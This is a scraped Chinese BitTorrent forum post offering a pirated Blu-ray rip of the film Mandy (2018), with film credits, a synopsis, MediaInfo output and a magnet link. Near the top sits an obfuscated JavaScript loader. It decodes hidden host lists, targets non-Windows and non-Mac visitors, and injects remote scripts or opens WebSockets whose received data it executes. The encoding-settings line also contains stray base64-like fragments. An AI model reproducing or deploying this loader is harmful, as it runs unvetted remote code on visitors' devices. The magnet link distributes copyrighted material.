曼蒂[双语字幕]迅雷下载.Mandy.2018.1080p.BluRay.x264.DTS 13.66GB

版主小s 29天前 406

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 曼蒂 / 曼迪 / 狂屠绝路(港)

◎片 名 Mandy

◎年 代 2018

◎产 地 美国 / 比利时 / 英国

◎类 别 动作 / 恐怖 / 犯罪

◎语 言 英语

◎上映日期 2018-01-19(圣丹斯电影节) / 2018-09-14(美国)

◎IMDb评分 6.5/10 from 62087 users

◎IMDb链接 https://www.imdb.com/title/tt6998518

◎豆瓣评分 5.4/10 from 12428 users

◎豆瓣链接 https://movie.douban.com/subject/27066203/

◎片 长 121分钟

◎导 演 帕诺斯·科斯马图斯 Panos Cosmatos

◎编 剧 帕诺斯·科斯马图斯 Panos Cosmatos / 亚伦·斯图尔特-安 Aaron Stewart-Ahn

◎主 演 尼古拉斯·凯奇 Nicolas Cage

安德丽娅·赖斯伯勒 Andrea Riseborough

莱纳斯·罗彻 Linus Roache

奈德·丹内利 Ned Dennehy

欧文·弗热瑞 Olwen Fouéré

理查德·布雷克 Richard Brake

比尔·杜克 Bill Duke

兰恩·皮雷 Line Pillet

克莱蒙·马霍内 Clément Baronnet

亚历克西斯·朱蒙特 Alexis Julemont

◎标 签 美国 | 惊悚 | 2018 | 犯罪 | 动作 | cult | 血腥 | 宗教

◎简 介

影片故事发生在1983年,樵夫雷德·米勒(尼古拉斯·凯奇 饰)与老婆曼蒂(安德丽亚·瑞斯波罗格 饰)居住在深山林里的一栋木屋。老婆曼蒂被一个价值观扭曲的宗教组织“新黎明之子”(The Children of the New Dawn)看上。该组织的领头杰瑞马雅(莱纳斯·罗彻 饰)欲收纳曼蒂入会未果,就在雷德面前活活把曼蒂烧死。雷德一度精神错乱,最终踏上复仇之路。

◎获奖情况

第71届戛纳电影节(2018)

导演双周单元(提名) 帕诺斯·科斯马图斯

第34届美国独立精神奖(2019)

最佳摄影(提名)

第31届芝加哥影评人协会奖(2018)

最佳原创配乐(提名) 约翰·约翰逊

  1. General

  2. Unique ID : 130446046670415429627576659850901801351 (0x6222FEA757C3123E168C59EFFC474987)

  3. Complete name : Mandy.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.7 GiB

  7. Duration : 2 h 1 min

  8. Overall bit rate : 16.2 Mb/s

  9. Movie name : Mandy 2018

  10. Encoded date : UTC 2021-07-05 00:48:17

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 1 min

  25. Bit rate : 14.6 Mb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.395

  36. Stream size : 12.4 GiB (91%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.5000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.75 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 2 h 1 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 1.28 GiB (9%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4610 (0x1202)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 51 min

  70. Bit rate : 13.5 kb/s

  71. Count of elements : 813

  72. Stream size : 10.8 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4611 (0x1203)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 51 min

  86. Bit rate : 13.6 kb/s

  87. Count of elements : 813

  88. Stream size : 10.8 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4612 (0x1204)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 51 min

  102. Bit rate : 7 865 b/s

  103. Count of elements : 812

  104. Stream size : 6.25 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : Yes

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4613 (0x1205)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 51 min

  118. Bit rate : 7 937 b/s

  119. Count of elements : 812

  120. Stream size : 6.31 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : Yes

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4608 (0x1200)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 59 min

  134. Bit rate : 9 318 b/s

  135. Count of elements : 1394

  136. Stream size : 7.93 MiB (0%)

  137. Language : English

  138. Default : Yes

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:11:14.799 : Chapter 02

  144. 00:21:25.826 : Chapter 03

  145. 00:34:30.234 : Chapter 04

  146. 00:51:18.158 : Chapter 05

  147. 01:04:38.499 : Chapter 06

  148. 01:08:57.341 : Chapter 07

  149. 01:16:49.646 : Chapter 08

  150. 01:26:33.980 : Chapter 09

  151. 01:36:26.655 : Chapter 10

  152. 01:47:46.084 : Chapter 11

  153. 01:57:05.018 : Chapter 12


TAGS 动作 恐怖 犯罪

磁力链:
  • magnet:?xt=urn:btih:131623BD9B990903BC69BD994B8736D0A94463B2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回